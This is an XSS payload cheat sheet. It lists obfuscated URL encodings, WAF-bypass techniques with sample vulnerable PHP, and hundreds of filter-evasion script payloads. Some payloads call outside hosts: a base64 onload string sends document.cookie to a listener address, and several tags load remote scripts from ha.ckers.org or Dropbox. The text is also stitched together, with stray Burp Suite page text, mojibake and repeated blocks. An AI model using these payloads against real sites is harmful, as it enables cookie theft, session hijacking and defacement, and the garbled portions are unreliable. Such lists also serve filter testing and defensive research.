DWORD encoding
Note: there are other of variations of Dword encoding - see the IP
Obfuscation calculator below for more details:
<A HREF="http://1113982867/">XSS</A>
Hex encoding
The total size of each number allowed is somewhere in the
neighborhood of 240 total characters as you can see on the second
digit, and since the hex number is between 0 and F the leading
zero on the third hex quotet is not required):
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
Octal encoding
Again padding is allowed, although you must keep it above 4 total
characters per class - as in class A, class B, etc…:
<A HREF="http://0102.0146.0007.00000223/">XSS</A>
Base64 encoding
<img onload="eval(atob('ZG9jdW1lbnQubG9jYXRpb249Imh0dHA6Ly9saXN
0ZXJuSVAvIitkb2N1bWVudC5jb29raWU='))">
Mixed encoding
Let’s mix and match base encoding and throw in some tabs and
newlines - why browsers allow this, I’ll never know). The tabs and
newlines only work if this is encapsulated with quotes:
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>
Protocol resolution bypass
// translates to http:// which saves a few more bytes. This is
really handy when space is an issue too (two less characters can
go a long way) and can easily bypass regex like (ht|
f)tp(s)?:// (thanks to Ozh for part of this one). You can also
change the // to \\\\. You do need to keep the slashes in place,
however, otherwise this will be interpreted as a relative path URL.
<A HREF="//www.google.com/">XSS</A>
Google “feeling lucky” part 1.
Firefox uses Google’s “feeling lucky” function to redirect the user to
any keywords you type in. So if your exploitable page is the top for
some random keyword (as you see here) you can use that feature
against any Firefox user. This uses Firefox’s keyword: protocol.
You can concatenate several keywords by using something like the
following keyword:XSS+RSnake for instance. This no longer works
within Firefox as of 2.0.
<A HREF="//google">XSS</A>
Google “feeling lucky” part 2.
This uses a very tiny trick that appears to work Firefox only,
because of it’s implementation of the “feeling lucky” function. Unlike
the next one this does not work in Opera because Opera believes
that this is the old HTTP Basic Auth phishing attack, which it is not.
It’s simply a malformed URL. If you click okay on the dialogue it will
work, but as a result of the erroneous dialogue box I am saying that
this is not supported in Opera, and it is no longer supported in
Firefox as of 2.0:
<A HREF="http://ha.ckers.org@google">XSS</A>
Google “feeling lucky” part 3.
This uses a malformed URL that appears to work in Firefox and
Opera only, because if their implementation of the “feeling lucky”
function. Like all of the above it requires that you are #1 in Google
for the keyword in question (in this case “google”):
<A HREF="http://google:ha.ckers.org">XSS</A>
Removing CNAMEs
When combined with the above URL, removing “www.” will save an
additional 4 bytes for a total byte savings of 9 for servers that have
this set up properly):
<A HREF="http://google.com/">XSS</A>
Extra dot for absolute DNS:
<A HREF="http://www.google.com./">XSS</A>
JavaScript link location:
<A HREF="javascript:document.location='http://
www.google.com/'">XSS</A>
Content replace as attack vector
Assuming http://www.google.com/ is programmatically replaced
with nothing). I actually used a similar attack vector against a
several separate real world XSS filters by using the conversion filter
itself (here is an example) to help create the attack vector
(IE: java&\#x09;script: was converted into java script:,
which renders in IE, Netscape 8.1+ in secure site mode and
Opera):
<A HREF="http://www.google.com/ogle.com/">XSS</A>
Character escape sequences
All the possible combinations of the character “<” in HTML and
JavaScript. Most of these won’t render out of the box, but many of
them can get rendered in certain circumstances as seen above.
<
%3C
&lt
<
&LT
&LT;
&#60
&#060
&#0060
&#00060
&#000060
&#0000060
<
<
<
<
<
<
&#x3c
&#x03c
&#x003c
&#x0003c
&#x00003c
&#x000003c
<
<
<
<
<
&#x000003c;
&#X3c
&#X03c
&#X003c
&#X0003c
&#X00003c
&#X000003c
&#X3c;
&#X03c;
&#X003c;
&#X0003c;
&#X00003c;
&#X000003c;
&#x3C
&#x03C
&#x003C
&#x0003C
&#x00003C
&#x000003C
<
<
<
<
<
&#x000003C;
&#X3C
&#X03C
&#X003C
&#X0003C
&#X00003C
&#X000003C
&#X3C;
&#X03C;
&#X003C;
&#X0003C;
&#X00003C;
&#X000003C;
\x3c
\x3C
\u003c
\u003C
Methods to Bypass WAF – Cross-Site Scripting
General issues
• Stored XSS
If an attacker managed to push XSS through the filter, WAF
wouldn’t be able to prevent the attack conduction.
• Reflected XSS in Javascript
Example: <script> ... setTimeout(\\"writetitle()\\",$\_GET\
[xss\]) ... </script>
Exploitation: /?xss=500); alert(document.cookie);//
• DOM-based XSS
Example: <script> ... eval($\_GET\[xss\]); ... </script>
Exploitation: /?xss=document.cookie
XSS via request Redirection.
• Vulnerable code:
...
header('Location: '.$_GET['param']);
...
As well as:
...
header('Refresh: 0; URL='.$_GET['param']);
...
• This request will not pass through the WAF:
/?param=<javascript:alert(document.cookie>)
• This request will pass through the WAF and an XSS attack will be
conducted in certain browsers.
/?param=<data:text/
html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=
WAF ByPass Strings for XSS.
<Img src = x onerror = "javascript: window.onerror = alert;
throw XSS">
<Video> <source onerror = "javascript: alert (XSS)">
<Input value = "XSS" type = text>
<applet code="javascript:confirm(document.cookie);">
<isindex x="javascript:" onmouseover="alert(XSS)">
"></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</
SCRIPT>
"><img src="x:x" onerror="alert(XSS)">
"><iframe src="javascript:alert(XSS)">
<object data="javascript:alert(XSS)">
<isindex type=image src=1 onerror=alert(XSS)>
<img src=x:alert(alt) onerror=eval(src) alt=0>
<img src="x:gif" onerror="window['al\u0065rt'](0)"></img>
<iframe/src="data:text/html,<svg onload=alert(1)>">
<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon;
alert(1)" http-equiv="refresh"/>
<svg><script
xlink:href=data&colon;,window.open('https://www.google.com/')><
/script
<meta http-equiv="refresh"
content="0;url=javascript:confirm(1)">
<iframe
src=javascript&colon;alert(document&period;location)>
<form><a href="javascript:\u0061lert(1)">X
</script><img/*%00/src="worksinchrome&colon;prompt(1)"/%00*/
onerror='eval(src)'>
<style>//*{x:expression(alert(/xss/))}//<style></style>
On Mouse Over
<img src="/" =_=" title="onerror='prompt(1)'">
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa
aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe
<script x> alert(1) </script 1=2
<form><button formaction=javascript&colon;alert(1)>CLICKME
<input/onmouseover="javaSCRIPT&colon;confirm(1)"
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C
%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-
0080C7055A83"><PARAM NAME="DataURL"
VALUE="javascript:alert(1)"></OBJECT>
Filter Bypass Alert Obfuscation
(alert)(1)
a=alert,a(1)
[1].find(alert)
top[“al”+”ert”](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
top[‘al\145rt’](1)
top[‘al\x65rt’](1)

top[8680439..toString(30)](1)Burp Suite
Web vulnerability scannerBurp Suite EditionsRelease
Notes<script>alert(123);</script>
<ScRipT>alert("XSS");</ScRipT>
<script>alert(123)</script>
<script>alert("hellox worldss");</script>
<script>alert('XSS')</script>
<script>alert('XSS');</script>
<script>alert('XSS')</script>
'><script>alert('XSS')</script>
<script>alert(/XSS/)</script>
<script>alert(/XSS/)</script>
</script><script>alert(1)</script>
'; alert(1);
')alert(1);//
<ScRiPt>alert(1)</sCriPt>
<IMG SRC=jAVasCrIPt:alert('XSS')>
<IMG SRC='javascript:alert('XSS');'>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=javascript:alert('XSS')>
<img src=xss onerror=alert(1)>

<iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00>

<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>
'

<input/onmouseover="javaSCRIPT&colon;confirm(1)"

<sVg><scRipt %00>alert(1) {Opera}

<img/src=`%00` onerror=this.onerror=confirm(1)

<form><isindex formaction="javascript&colon;confirm(1)"

<img src=`%00`&NewLine; onerror=alert(1)&NewLine;

<script/&Tab;
src='https://dl.dropbox.com/u/13018058/js.js'
/&Tab;></script>

<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?

<iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb
2FkPWFsZXJ0KDEpPg==">

<script /%00/>/%00/alert(1)/%00/</script /%00/

"><h1/onmouseover='\u0061lert(1)'>%00

<iframe/src="data:text/html,<svg
onload=alert(1)>">

<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon;

alert(1)" http-equiv="refresh"/>

<svg><script
xlink:href=data&colon;,window.open('https://www.google.com
/')></script

<svg><script
x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}

<meta http-equiv="refresh"
content="0;url=javascript:confirm(1)">
<iframe
src=javascript&colon;alert(document&period;location&r
par;>

<form><a href="javascript:\u0061lert(1)">X

</script><img/*%00/src="worksinchrome&colon;prompt(1&
#x29;"/%00*/onerror='eval(src)'>
<img/	
 src=`~` onerror=prompt(1)>
<form><iframe 	

src="javascript:alert(1)"
	;>

<a href="data:application/x-x509-user-
cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2Ny
aXB0Pg=="	
>X</a

http://www.google<script
.com>alert(document.location)</script

<a href=[]"
onmouseover=prompt(1)//">XYZ</a
<img/src=@  onerror = prompt('1')

<style/onload=prompt('XSS')

<script ^^>alert(String.fromCharCode(49))</script ^^

</style  ><script  

:-(>/**/alert(document.location)/**/</script   :-(

</form><input type="date" onfocus="alert(1)">

<form><textarea  onkeyup='\u0061\u006C\u0065\u0072\

u0074(1)'>

<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\
uFF54\u1455\uFF11\u1450')/***/</script /***/

<iframe srcdoc='<body onload=prompt(1)>'>

<a href="javascript:void(0)"
onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>

<script ~>alert(0%0)</script ~>

<style/onload=<!--
	>
alert
(1)>

<///style///><span %2F
onmousemove='alert(1)'>SPAN

<img/src='http://i.imgur.com/P8mL8.jpg'
onmouseover=&Tab;prompt(1)

"><svg><style>{-o-link-source&colon;'<body/onload=
confirm(1)>'

<blink/ onmouseover=prompt
(1)>OnMouseOver {Firefox & Opera}

<marquee onstart='javascript:alert(1)'>^__^

<div/style="width:expression(confirm(1))">X</div> {IE7}
<iframe/%00/ src=javaSCRIPT&colon;alert(1)

//<form/action=javascript:alert(document&period;
cookie)><input/type='submit'>//

/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1)
/*iframe/src*/>

//|\\ <script //|\\

src='https://dl.dropbox.com/u/13018058/js.js'> //|\\
</script //|\\

</font>/<svg><style>{src:'<style/onload=this.onload=c
onfirm(1)>'</font>/</style>

<a/href="javascript: javascript:prompt(1)"><input
type="X">

</plaintext\></|\><plaintext/onmouseover=prompt(1)

</svg>''<svg><script
'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1)
{Opera}

<a href="javascript&colon;\
u0061l&#101%72t(1)"><button>

<div onmouseover='alert(1)'>DIV</div>

<iframe style="xg-
p:absolute;top:0;left:0;width:100%;height:100%"
onmouseover="prompt(1)">

<a href="jAvAsCrIpT&colon;alert(1)">X</a>

<embed
src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/m
isc/pdf/helloworld_js_X.pdf">

<object
data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/
misc/pdf/helloworld_js_X.pdf">
<var onmouseover="prompt(1)">On Mouse Over</var>

<a
href=javascript&colon;alert(document&period;cookie&rp
ar;>Click Here</a>

<img src="/" =_=" title="onerror='prompt(1)'">

<%

<script src="data:text/javascript,alert(1)"></script>
<iframe/src \/\/onload = prompt(1)

<iframe/onreadystatechange=alert(1)

<svg/onload=alert(1)

<input value=<><iframe/src=javascript:confirm(1)

<input type="text" value=``

<div/onmouseover='alert(1)'>X</div>

http://www.<script>alert(1)</script .com

<iframe
src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab
;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&T
ab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&New
Line;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Ta
b;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&
Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab
;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;
&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Ta
b;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e
&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab
;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&T
ab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;
&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Ta
b;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;
&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Ta
b;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&
Tab;&Tab;&Tab;&Tab;%29></iframe>
<svg><script ?>alert(1)

<iframe
src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;
t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></
iframe>

<img src=`xx:xx`onerror=alert(1)>

<meta http-equiv="refresh"
content="0;javascript&colon;alert(1)"/>
<math><a xlink:href="//jsfiddle.net/t846h/">click

<embed code="http://businessinfo.co.uk/labs/xss/xss.swf"
allowscriptaccess=always>
<svg contentScriptType=text/vbs><script>MsgBox+1

<a href="data:text/html;base64_,<svg/onload=\
u0061l&#101%72t(1)>">X</a

<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\
u0074('\u0061') worksinIE>

<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \
u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\
u0074(~'\u0061')</script U+

<script/src="data&colon;text%2Fj\u0061v\u0061script,\
u0061lert('\u0061')"></script a=\u0061 & /=%2F
<script/src=data&colon;text/j\u0061v\
u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/
XSS/)></script

<object data=javascript&colon;\u0061l&#101%72t(1)>

<script>+-+-1-+-+alert(1)</script>

<body/onload=<!-->&#10alert(1)>

<script itworksinallbrowsers>/<script */alert(1)</script

<img src ?itworksonchrome?\/onerror = alert(1)

<svg><script>//&NewLine;confirm(1);</script </svg>
<svg><script onlypossibleinopera:-)> alert(1)

<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa

aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe

<script x> alert(1) </script 1=2

<div/onmouseover='alert(1)'> style="x:">

<--`<img/src=` onerror=alert(1)> --!>

<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#
x73&#x63&#x72&#x69&#x000070&#x074,ale&
#x00000072;t(1)></script>

<div style="xg-
p:absolute;top:0;left:0;width:100%;height:100%"
onmouseover="prompt(1)" onclick="alert(1)">x</button>

"><img src=x
onerror=window.open('https://www.google.com/');>

<form><button formaction=javascript&colon;alert(1)>CLICKME

<math><a xlink:href="//jsfiddle.net/t846h/">click

<object
data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></
object>

<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C
%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>

<a
href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#
116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&
#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&
#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#
34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Cli
ck Me</a>

<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40,

49, 41)</SCRIPT>
�;alert(String.fromCharCode(88,83,83))//�;alert(String.f
romCharCode(88,83,83))//
�;alert(String.fromCharCode(88,83,83))//
�;alert(String.fromCharCode(88,83,83))//�></
SCRIPT>�>�><SCRIPT>alert(String.fromCharCode(88,83,83))<
/SCRIPT>
<IMG ��><SCRIPT>alert(�XSS�)</SCRIPT>�>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=�jav ascript:alert(�XSS�);�>
<IMG SRC=�jav	ascript:alert(�XSS�);�>
<<SCRIPT>alert(�XSS�);//<</SCRIPT>
%253cscript%253ealert(1)%253c/script%253e
�><s�%2b�cript>alert(document.cookie)</script>
foo<script>alert(1)</script>
<scr<script>ipt>alert(1)</scr</script>ipt>
<IMG
SRC=javascrip&#1
16;:alert('XS&
#83;')>
<IMG
SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099
&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#00
00108&#0000101&#0000114&#0000116&#0000040&#0000039&#000008
8&#0000083&#0000083&#0000039&#0000041>
<IMG
SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3
A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#
x29>
<BODY BACKGROUND=�javascript:alert(�XSS�)�>
<BODY ONLOAD=alert(�XSS�)>
<INPUT TYPE=�IMAGE� SRC=�javascript:alert(�XSS�);�>
<IMG SRC=�javascript:alert(�XSS�)�
<iframe src=http://ha.ckers.org/scriptlet.html <
javascript:alert("hellox worldss")
<img src="javascript:alert('XSS');">
<img src=javascript:alert("XSS")>
<"';alert(String.fromCharCode(88,83,83))//\';alert(String.
fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83
,83))//\";alert(String.fromCharCode(88,83,83))//--></
SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</
SCRIPT>
<META HTTP-EQUIV="refresh"
CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnW
FNTJyk8L3NjcmlwdD4K">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<EMBED
SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH
A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53
My5vcmcv
MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOT
k5L3hs
aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIG
hlaWdodD0iMjAw
IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YW
xlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="
type="image/svg+xml" AllowScriptAccess="always"></EMBED>
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" ''
SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT
SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<"';alert(String.fromCharCode(88,83,83))//\';alert(String.
fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83
,83))//\";alert(String.fromCharCode(88,83,83))//--></
SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</
SCRIPT>
';alert(String.fromCharCode(88,83,83))//\';alert(String.fr
omCharCode(88,83,83))//";alert(String.fromCharCode(88,83,8
3))//\";alert(String.fromCharCode(88,83,83))//--></
SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))<?/
SCRIPT>&submit.x=27&submit.y=9&cmd=search
<script>alert("hellox
worldss")</script>&safe=high&cx=006665157904466893121:su_t
zknyxug&cof=FORID:9#510
<script>alert("XSS");</script>&search=1
0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?
8String.fromCharCode(88,83,83))//";alert(String.fromCharCo
de?(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?
29//--></
SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83%?
2C83))</SCRIPT>&submit-frmGoogleWeb=Web+Search
<h1><font color=blue>hellox worldss</h1>
<BODY ONLOAD=alert('hellox worldss')>
<input onfocus=write(XSS) autofocus>
<input onblur=write(XSS) autofocus><input autofocus>
<body
onscroll=alert(XSS)><br><br><br><br><br><br>...<br><br><br
><br><input autofocus>
<form><button formaction="javascript:alert(XSS)">lol
<img src=x onerror=alert(XSS)//">
<![><img src="]><img src=x onerror=alert(XSS)//">
<style><img src="</style><img src=x onerror=alert(XSS)//">
<? foo="><script>alert(1)</script>">
<! foo="><script>alert(1)</script>">
</ foo="><script>alert(1)</script>">
<? foo="><x foo='?><script>alert(1)</script>'>">
<! foo="[[[Inception]]"><x
foo="]foo><script>alert(1)</script>">
<% foo><x foo="%><script>alert(123)</script>">
<div style="font-family:'foo
;color:red;';">LOL
LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,
Safari*[0]/color:green;color:bl/*IE*/ue;}</style>
<script>({0:#0=alert/#0#/#0#(0)})</script>
<svg
xmlns="http://www.w3.org/2000/svg">LOL<script>alert(123)</
script></svg>
<SCRIPT>alert(/XSS/.source)</SCRIPT>
\\";alert('XSS');//
</TITLE><SCRIPT>alert(\"XSS\");</SCRIPT>
<INPUT TYPE=\"IMAGE\"
SRC=\"javascript:alert('XSS');\">
<BODY BACKGROUND=\"javascript:alert('XSS')\">
<BODY ONLOAD=alert('XSS')>
<IMG DYNSRC=\"javascript:alert('XSS')\">
<IMG LOWSRC=\"javascript:alert('XSS')\">
<BGSOUND SRC=\"javascript:alert('XSS');\">
<BR SIZE=\"&{alert('XSS')}\">
<LAYER
SRC=\"http://ha.ckers.org/scriptlet.html\"
></LAYER>
<LINK REL=\"stylesheet\"
HREF=\"javascript:alert('XSS');\">
<LINK REL=\"stylesheet\"
HREF=\"http://ha.ckers.org/xss.css\">
<STYLE>@import'http://ha.ckers.org/xss&#
46;css';</STYLE>
<META HTTP-EQUIV=\"Link\"
Content=\"<http://ha.ckers.org/xss.css&
gt;; REL=stylesheet\">
<STYLE>BODY{-moz-binding:url(\"http://ha&#46
;ckers.org/xssmoz.xml#xss\")}</STYLE>
<XSS STYLE=\"behavior: url(xss.htc);\">
<STYLE>li {list-style-image:
url(\"javascript:alert('XSS')\");}</STYLE><U
L><LI>XSS
<IMG SRC='vbscript:msgbox(\"XSS\")'>
<IMG SRC=\"mocha:[code]\">
<IMG SRC=\"livescript:[code]\">
�scriptualert(EXSSE)�/scriptu
<META HTTP-EQUIV=\"refresh\"
CONTENT=\"0;url=javascript:alert('XSS');\">
<META HTTP-EQUIV=\"refresh\"
CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVy
dCgnWFNTJyk8L3NjcmlwdD4K\">
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;
URL=http://;URL=javascript:alert('XSS');\"
<IFRAME
SRC=\"javascript:alert('XSS');\"></IFRAME>
<FRAMESET><FRAME
SRC=\"javascript:alert('XSS');\"></FRAMESET>
<TABLE BACKGROUND=\"javascript:alert('XSS')\">
<TABLE><TD
BACKGROUND=\"javascript:alert('XSS')\">
<DIV STYLE=\"background-image:
url(javascript:alert('XSS'))\">
<DIV STYLE=\"background-image:\0075\0072\006C\
0028'\006a\
0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\
0061\006c\
0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'
\0029\">
<DIV STYLE=\"background-image:
url(javascript:alert('XSS'))\">
<DIV STYLE=\"width: expression(alert('XSS'));\">
<STYLE>@im\port'\ja\vasc\
ript:alert(\"XSS\")';</STYLE>
<IMG
STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">
<XSS STYLE=\"xss:expression(alert('XSS'))\">
exp/*<A STYLE='no\xss:noxss(\"*//*\");
xss:ex/*XSS*//*/*/pression(alert(\"XSS\"))'>
<STYLE
TYPE=\"text/javascript\">alert('XSS');</STYLE>
<STYLE>.XSS{background-
image:url(\"javascript:alert('XSS')\");}</
STYLE><A CLASS=XSS></A>
<STYLE
type=\"text/css\">BODY{background:url(\"javascript&
#058;alert('XSS')\")}</STYLE>

<BASE HREF=\"javascript:alert('XSS');//\">
<OBJECT TYPE=\"text/x-scriptlet\"
DATA=\"http://ha.ckers.org/scriptlet.html\
"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-
0080c744f389><param name=url
value=javascript:alert('XSS')></OBJECT>
<EMBED
SRC=\"http://ha.ckers.org/xss.swf\"
AllowScriptAccess=\"always\"></EMBED>
<EMBED
SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Im
h0dH
A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53
My5vcmcv
MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOT
k5L3hs
aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIG
hlaWdodD0iMjAw
IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YW
xlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\"
type=\"image/svg+xml\"
AllowScriptAccess=\"always\"></EMBED>
a=\"get\";
b=\"URL(\\"\";
c=\"javascript:\";
d=\"alert('XSS');\\")\";
eval(a+b+c+d);
<HTML xmlns:xss><?import namespace=\"xss\"
implementation=\"http://ha.ckers.org/xss.h
tc\"><xss:xss>XSS</xss:xss></
HTML>
<XML ID=I><X><C><!
[CDATA[<IMG SRC=\"javas]]><!
[CDATA[cript:alert('XSS');\">]]>
</C></X></xml><SPAN DATASRC=#I
DATAFLD=C DATAFORMATAS=HTML></SPAN>
<XML ID=\"xss\"><I><B><IMG
SRC=\"javas
<? echo('<SCR)';
echo('IPT>alert(\"XSS\")</SCRIPT>'); ?>
<IMG
SRC=\"http://www.thesiteyouareon.com/somecomma
nd.php?somevariables=maliciouscode\">
Redirect 302 /a.jpg
http://victimsite.com/admin.asp&deleteuser
<META HTTP-EQUIV=\"Set-Cookie\"
Content=\"USERID=<SCRIPT>alert('XSS')</SCRIPT>
\">
<HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\"
CONTENT=\"text/html; charset=UTF-7\"> </HEAD>
+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
<SCRIPT a=\">\"
SRC=\"http://ha.ckers.org/xss.js\"><
/SCRIPT>
<SCRIPT =\">\"
SRC=\"http://ha.ckers.org/xss.js\"><
/SCRIPT>
<SCRIPT a=\">\" ''
SRC=\"http://ha.ckers.org/xss.js\"><
/SCRIPT>
<SCRIPT \"a='>'\"
SRC=\"http://ha.ckers.org/xss.js\"><
/SCRIPT>
<SCRIPT a=`>`
SRC=\"http://ha.ckers.org/xss.js\"><
/SCRIPT>
<SCRIPT a=\">'>\"
SRC=\"http://ha.ckers.org/xss.js\"><
/SCRIPT>
<SCRIPT>document.write(\"<SCRI\");</SCRIPT
>PT
SRC=\"http://ha.ckers.org/xss.js\"><
/SCRIPT>
<A
HREF=\"http://66.102.7.147/\">XSS</A
>
<A HREF=\"http://%77%77%77%2E%67%6F%6F%67%6C%65%2E
%63%6F%6D\">XSS</A>
<A HREF=\"http://1113982867/\">XSS</A>
<A
HREF=\"http://0x42.0x0000066.0x7.0x93/\"&g
t;XSS</A>
<A
HREF=\"http://0102.0146.0007.00000223/\"&g
t;XSS</A>
<A HREF=\"htt p://6
6.000146.0x7.147/\">XSS</A>
<A HREF=\"//www.google.com/\">XSS</A>
<A HREF=\"//google\">XSS</A>
<A
HREF=\"http://ha.ckers.org@google\">XSS<
/A>
<A
HREF=\"http://google:ha.ckers.org\">XSS
</A>
<A HREF=\"http://google.com/\">XSS</A>
<A
HREF=\"http://www.google.com./\">XSS&lt
;/A>
<A
HREF=\"javascript:document.location='http://w
ww.google.com/'\">XSS</A>
<A
HREF=\"http://www.gohttp://www.google.
com/ogle.com/\">XSS</A>
<
%3C
&lt
<
&LT
&LT;
&#60
&#060
&#0060
&#00060
&#000060
&#0000060
<
&#x3c
&#x03c
&#x003c
&#x0003c
&#x00003c
&#x000003c
<
<
<
<
<
&#x000003c;
&#X3c
&#X03c
&#X003c
&#X0003c
&#X00003c
&#X000003c
&#X3c;
&#X03c;
&#X003c;
&#X0003c;
&#X00003c;
&#X000003c;
&#x3C
&#x03C
&#x003C
&#x0003C
&#x00003C
&#x000003C
<
<
<
<
<
&#x000003C;
&#X3C
&#X03C
&#X003C
&#X0003C
&#X00003C
&#X000003C
&#X3C;
&#X03C;
&#X003C;
&#X0003C;
&#X00003C;
&#X000003C;
\x3c
\x3C
\u003c
\u003C
<iframe
src=http://ha.ckers.org/scriptlet.html>
<IMG SRC=\"javascript:alert('XSS')\"
<SCRIPT SRC=//ha.ckers.org/.js>
